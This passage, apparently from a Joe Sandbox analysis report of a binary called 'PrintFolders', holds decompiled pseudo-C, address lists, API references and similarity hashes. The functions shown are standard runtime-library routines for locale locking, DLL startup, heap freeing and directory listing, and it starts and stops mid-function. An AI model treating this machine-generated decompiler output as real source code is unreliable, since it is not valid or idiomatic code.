				_t56 =  *0x450d0c; // 0x0
				if(_t74 == 0) {
					E0040E0A3( &_v24, _t74);
					_t86 =  *0x450eb8 - _t74; // 0x0
					if(_t86 == 0) {
						_t53 =  *0x450098; // 0x1
						_t54 = _t53 + 1;
						 *0x450098 = _t54;
						 *0x450eb8 = _t54;
					}
					E0040E0FB( &_v24);
					_t74 =  *0x450eb8; // 0x0
				}
				_t59 =  *((intOrPtr*)(_t77 + 4));
				if(_t74 >=  *((intOrPtr*)(_t59 + 0xc))) {
					_t78 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t59 + 0x14)) == 0) {
						L11:
						if(_t78 != 0) {
							L19:
							E0040E0FB( &_v32);
							 *[fs:0x0] = _v16;
							_pop(_t75);
							_pop(_t79);
							_pop(_t57);
							return E0040EBBF(_t78, _t57, _v20 ^ _t80, _t72, _t75, _t79);
						}
						L12:
						if(_t56 == 0) {
							_t78 = E0040EDCF(_t74, _t78, __eflags, 8);
							_v24 = _t78;
							_v8 = 1;
							_t66 =  *((intOrPtr*)(_v28 + 4));
							__eflags = _t66;
							if(_t66 == 0) {
								_t43 = 0x4399f7;
							} else {
								_t43 =  *((intOrPtr*)(_t66 + 0x18));
								__eflags = _t43;
								if(_t43 == 0) {
									_t24 = _t66 + 0x1c; // 0x1c
									_t43 = _t24;
								}
							}
							E00403F10(_t43);
							 *((intOrPtr*)(_t78 + 4)) = 0;
							 *_t78 = 0x42ef14;
							E00403FC0( &_v84);
							_v28 = _t78;
							_v8 = 2;
							E0040E254(__eflags, _t78);
							_t72 =  *_t78;
							 *((intOrPtr*)( *_t78 + 4))();
							 *0x450d0c = _t78;
						} else {
							_t78 = _t56;
						}
						goto L19;
					}
					_t48 = E0040E280();
					if(_t74 >=  *((intOrPtr*)(_t48 + 0xc))) {
						goto L12;
					}
					_t78 =  *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + _t74 * 4));
					goto L11;
				}
				_t78 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 8)) + _t74 * 4));
				if(_t78 != 0) {
					goto L19;
				}
				goto L8;
			}

0x0040caf0
0x0040caf3
0x0040caf5
0x0040cb00
0x0040cb04
0x0040cb09
0x0040cb0b
0x0040cb11
0x0040cb15
0x0040cb1b
0x0040cb23
0x0040cb26
0x0040cb2b
0x0040cb32
0x0040cb38
0x0040cb40
0x0040cb46
0x0040cb4b
0x0040cb51
0x0040cb53
0x0040cb58
0x0040cb59
0x0040cb5e
0x0040cb5e
0x0040cb66
0x0040cb6b
0x0040cb6b
0x0040cb71
0x0040cb77
0x0040cb89
0x0040cb89
0x0040cb8b
0x0040cb8f
0x0040cba1
0x0040cba3
0x0040cc16
0x0040cc19
0x0040cc23
0x0040cc2b
0x0040cc2c
0x0040cc2d
0x0040cc3b
0x0040cc3b
0x0040cba5
0x0040cba7
0x0040cbb4
0x0040cbb9
0x0040cbbc
0x0040cbc3
0x0040cbc6
0x0040cbc8
0x0040cbd6
0x0040cbca
0x0040cbca
0x0040cbcd
0x0040cbcf
0x0040cbd1
0x0040cbd1
0x0040cbd1
0x0040cbcf
0x0040cbdf
0x0040cbe7
0x0040cbee
0x0040cbf4
0x0040cbf9
0x0040cbfd
0x0040cc01
0x0040cc06
0x0040cc0d
0x0040cc10
0x0040cba9
0x0040cba9
0x0040cba9
0x00000000
0x0040cba7
0x0040cb91
0x0040cb99
0x00000000
0x00000000
0x0040cb9e
0x00000000
0x0040cb9e
0x0040cb7c
0x0040cb81
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040CB26
std::_Lockit::_Lockit.LIBCPMT ref: 0040CB46
std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB66
std::_Facet_Register.LIBCPMT ref: 0040CC01
std::_Lockit::~_Lockit.LIBCPMT ref: 0040CC19

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 87b63e902258446f7da7e1067b62c0637823b51c00972e01863bc4e59d6f7a1c
Instruction ID: 4299aa7d4a227c1bcf07fbc90c3f6f33ea46ae6c1256ae29d36ea46de7090174
Opcode Fuzzy Hash: 87b63e902258446f7da7e1067b62c0637823b51c00972e01863bc4e59d6f7a1c
Instruction Fuzzy Hash: F641BE71A00215CBCB10DF56E982B6EB7B4EF40714F24457EE8067B382DB79AD45CB89

Uniqueness

Uniqueness Score: -1.00%

Function 10003486 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E10003486(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x10015758);
				E10003C50(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E10003591( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t45 = E1000327C(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_push(_t42);
						_push( *((intOrPtr*)(_t47 + 8)));
						_t26 = E10001000();
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_push(_t26);
								_push( *((intOrPtr*)(_t47 + 8)));
								_t29 = E10001000();
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E100033D6(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E10003591( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E1000327C(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E10003591( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x10017968 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x10003486
0x10003486
0x10003488
0x1000348d
0x10003492
0x10003497
0x100034a8
0x100034a8
0x100034ac
0x100034af
0x100034bb
0x100034bb
0x100034c8
0x100034ca
0x100034cd
0x100034cf
0x10003578
0x10003578
0x1000357f
0x10003581
0x10003584
0x10003590
0x10003590
0x100034df
0x100034e1
0x100034e4
0x100034e6
0x00000000
0x00000000
0x100034ec
0x100034ec
0x100034ed
0x100034ee
0x100034f1
0x100034f6
0x100034f8
0x100034fb
0x100034fe
0x10003500
0x10003502
0x10003504
0x10003505
0x10003506
0x10003509
0x1000350e
0x10003510
0x10003510
0x10003516
0x10003517
0x1000351c
0x10003522
0x10003522
0x10003502
0x10003527
0x10003529
0x10003530
0x1000353a
0x1000353c
0x1000353f
0x10003541
0x1000354d
0x10003575
0x10003575
0x00000000
0x1000352b
0x1000352b
0x1000352e
0x00000000
0x00000000
0x00000000
0x1000352e
0x10003529
0x100034b1
0x100034b4
0x00000000
0x00000000
0x100034b6
0x00000000
0x100034b6
0x10003499
0x1000349f
0x00000000
0x00000000
0x100034a1
0x00000000

APIs

dllmain_raw.LIBCMT ref: 100034C3
dllmain_crt_dispatch.LIBCMT ref: 100034DA
dllmain_raw.LIBCMT ref: 10003522
dllmain_crt_dispatch.LIBCMT ref: 10003535
dllmain_raw.LIBCMT ref: 10003548

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 52375cf17bb0d101189a85c26acd30f86b67d56865f3d0828ade5b8236379d4d
Instruction ID: 4eae28f9cec24adab2deedadfa513907509d2ff78710b81ad0a66de0a83b0cb4
Opcode Fuzzy Hash: 52375cf17bb0d101189a85c26acd30f86b67d56865f3d0828ade5b8236379d4d
Instruction Fuzzy Hash: D8217F71D04A65BAFB23CE64DC45A6F3BADEB846D1F018115FC046B228D7309E419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA9B Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000BA9B(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x100176f8; // 0x10017748
					if(_t23 != 0) {
						E10008701(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x100176fc; // 0x1001835c
					if(_t24 != 0) {
						E10008701(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x10017700; // 0x1001835c
					if(_t25 != 0) {
						E10008701(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x10017728; // 0x1001774c
					if(_t26 != 0) {
						E10008701(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x1001772c; // 0x10018360
					if(_t27 != 0) {
						return E10008701(_t6);
					}
				}
				return _t6;
			}

0x1000baa1
0x1000baa6
0x1000baaa
0x1000bab0
0x1000bab3
0x1000bab8
0x1000babc
0x1000bac2
0x1000bac5
0x1000baca
0x1000bace
0x1000bad4
0x1000bad7
0x1000badc
0x1000bae0
0x1000bae6
0x1000bae9
0x1000baee
0x1000baef
0x1000baf2
0x1000baf8
0x00000000
0x1000bb00
0x1000baf8
0x1000bb03

APIs

_free.LIBCMT ref: 1000BAB3

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 1000BAC5
_free.LIBCMT ref: 1000BAD7
_free.LIBCMT ref: 1000BAE9
_free.LIBCMT ref: 1000BAFB

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5fb86163ccc0cf36f5f605bb33fc0d434e280abf0fbc2f313962ea386a657b11
Instruction ID: 322c929f8fa3144f5d3f5fbca3afb4a8048b16d2c69f3c46f8cc95a9a1cb27b8
Opcode Fuzzy Hash: 5fb86163ccc0cf36f5f605bb33fc0d434e280abf0fbc2f313962ea386a657b11
Instruction Fuzzy Hash: 30F0F431618A209BEA54DF68E8C2C1A73E9FB057E07B08809F49CD754DCB32FC808B60

Uniqueness

Uniqueness Score: -1.00%

Function 00425AE6 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00425AE6(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x43d160; // 0x43d1b4
					if(_t23 != 0) {
						E0041E2B8(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x43d164; // 0x450784
					if(_t24 != 0) {
						E0041E2B8(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x43d168; // 0x450784
					if(_t25 != 0) {
						E0041E2B8(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x43d190; // 0x43d1b8
					if(_t26 != 0) {
						E0041E2B8(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x43d194; // 0x450788
					if(_t27 != 0) {
						return E0041E2B8(_t6);
					}
				}
				return _t6;
			}

0x00425aec
0x00425af1
0x00425af5
0x00425afb
0x00425afe
0x00425b03
0x00425b07
0x00425b0d
0x00425b10
0x00425b15
0x00425b19
0x00425b1f
0x00425b22
0x00425b27
0x00425b2b
0x00425b31
0x00425b34
0x00425b39
0x00425b3a
0x00425b3d
0x00425b43
0x00000000
0x00425b4b
0x00425b43
0x00425b4e

APIs

_free.LIBCMT ref: 00425AFE

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 00425B10
_free.LIBCMT ref: 00425B22
_free.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B46

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ecef4e8d75fb8ce96c2f369775812b1e7556ebdaa90a8c02d54b4a4fccf6128e
Instruction ID: 60f62acaf68e8d6c11223a2e69ab09c63260fcc0bd08be4ea5654f22acdb9dbb
Opcode Fuzzy Hash: ecef4e8d75fb8ce96c2f369775812b1e7556ebdaa90a8c02d54b4a4fccf6128e
Instruction Fuzzy Hash: B5F03632A44614ABDA24EB66F891C5BBBDDAA007147E4185BFC0CD7741CB78FCC0866C

Uniqueness

Uniqueness Score: -1.00%

Function 00442FB3 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00442FCB
_free.LIBCMT ref: 00442FDD
_free.LIBCMT ref: 00442FEF
_free.LIBCMT ref: 00443001
_free.LIBCMT ref: 00443013

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 96f50b6fd2803bd5c4bda2139404532c31f5521687e24c4fa50f21b7b3d75918
Instruction ID: b796e144102367d81c75d730982b4c61d5d1dbfd69c6644539770f527747fe0f
Opcode Fuzzy Hash: 96f50b6fd2803bd5c4bda2139404532c31f5521687e24c4fa50f21b7b3d75918
Instruction Fuzzy Hash: 39F09632404200B7EA60DF76F985C5773F9AA04B14B94880BF044D7A64CB78FCC0965C

Uniqueness

Uniqueness Score: -1.00%

Function 100093AE Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E100093AE(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E1000709E(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E1000B283(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E10006359();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E10008BFC(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E1000B283(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E10009998(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E10008701(_t300);
														_t302 = _v12;
													}
													E10008701(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E1000B283(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E10006359();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x10017004; // 0x79eab102
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E1000D050(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E10009391(_t244 - _t287 + 1, _t287,  &_v676, E100098A5(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E100092C2( &(_v608.cFileName),  &_v640,  &_v609, E100098A5(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E10008701(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E10008701(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E1000CB20(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E100091F8);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E10008701(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E100031FF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E10008701(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E1000D010(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
